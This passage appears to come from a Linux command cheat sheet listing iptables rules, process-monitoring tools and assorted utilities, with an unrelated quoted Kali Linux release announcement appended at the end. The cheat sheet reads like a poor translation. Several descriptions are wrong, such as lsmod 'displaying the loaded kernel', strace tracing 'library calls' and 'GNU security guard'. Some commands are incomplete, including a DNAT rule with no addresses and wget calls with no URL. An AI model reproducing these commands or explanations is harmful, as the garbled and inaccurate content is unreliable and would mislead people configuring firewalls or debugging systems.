6. iptables -t filter -A INPUT -p tcp –dport telnet -j ACCEPT: allow input telnet connections.
7. iptables -t filter -A OUTPUT -p tcp –dport http -j DROP: block output HTTP connections.
8. iptables -t filter -A FORWARD -p tcp –dport pop3 -j ACCEPT: allow POP connections to a front chain.
9. iptables -t filter -A INPUT -j LOG –log-prefix “DROP INPUT”: registering an input string.
10. iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE: configure a PAT (Port Address Translation) on eth0, hiding the forced departure packages.
11. iptables -t nat -A PREROUTING -d -p tcp -m tcp –dport 22 -j DNAT –to-destination redirect packets directed from one host to another.

Monitoring and debugging

1. top: show cpu processes.
2. ps -eafw: show cpu processes.
3. ps -e -o pid,args –forest: shows Linux processes in a hierarchal manner.
4. pstree: show system processes tree.
5. kill -9 ID_Process: force close and finish process..
6. kill -1 ID_Process: force a process to reload the configuration.
7. lsof -p $$: display a list of files opened by processes.
8. lsof /home/user1: lists open files on a given path by the system.
9. strace -c ls >/dev/null: show system calls made ​​and received by a process.
10. strace -f -e open ls >/dev/null: display library calls.
11. watch -n1 ‘cat /proc/interrupts’: show interruptions in real time.
12. last reboot: show reboot history.
13. lsmod: display the loaded kernel.
14. free -m: Displays the status of RAM in megabytes.
15. smartctl -A /dev/hda: monitor the reliability of a hard drive via SMART.
16. smartctl -i /dev/hda: check if SMART is enabled on a hard disk.
17. tail /var/log/dmesg: show events inherent in the charging process of the kernel.
18. tail /var/log/messages: show system events.

Other useful commands

1. apropos …keyword: display a list of commands that belong to the keywords of a program, are useful when you know what makes your program, but not know the command name.
2. man ping: display manual pages on-line, for example, in a ping command, use the ‘-k’ to find any related command.
3. whatis …keyword: Displays the description of what the program does.
4. mkbootdisk –device /dev/fd0 `uname -r`: create a floppy boteable.
5. gpg -c file1: encrypt a file with GNU security guard.
6. gpg file1.gpg: decode a file with GNU Security Guard.
7. wget -r download an entire website.
8. wget -c download a file with the possibility to stop the download and resume later.
9. echo ‘wget -c‘ | at 09:00: Start a download at any time. In this case begin at 9 am.
10. ldd /usr/bin/ssh: display the shared libraries required by ssh.
11. alias hh=’history’: place an alias for a command-hh = history.
12. chsh: change the command Shell.
13. chsh –list-shells: is an appropriate command to find out if you have to remote into another terminal.
14. who -a: show who is registered, and print time of last import system, dead processes, system logging processes, active processes produced by init, current and past performance of the system clock changes.


The official update from BackTrack Central:

Seven years of developing BackTrack Linux has taught us a significant amount about what we, and the security community, think a penetration testing distribution should look like. We’ve taken all of this knowledge and experience and implemented it in our “next generation” penetration testing distribution.

After a year of silent development, we are incredibly proud to announce the release and public availability of “Kali Linux“, the most advanced, robust, and stable penetration testing distribution to date.

Kali is a more mature, secure, and enterprise-ready version of BackTrack Linux. Trying to list all the new features and possibilities that are now available in Kali would be an impossible task on this single page. We therefore invite you to visit our new Kali Linux Website and Kali Linux Documentation site to experience the goodness of Kali for yourself.

We are extremely excited about the future of the distribution and we can’t wait to see what the BackTrack community will do with Kali. Sign up in the new Kali Forums and join us in IRC in #kali-linux on and help us usher in this new era.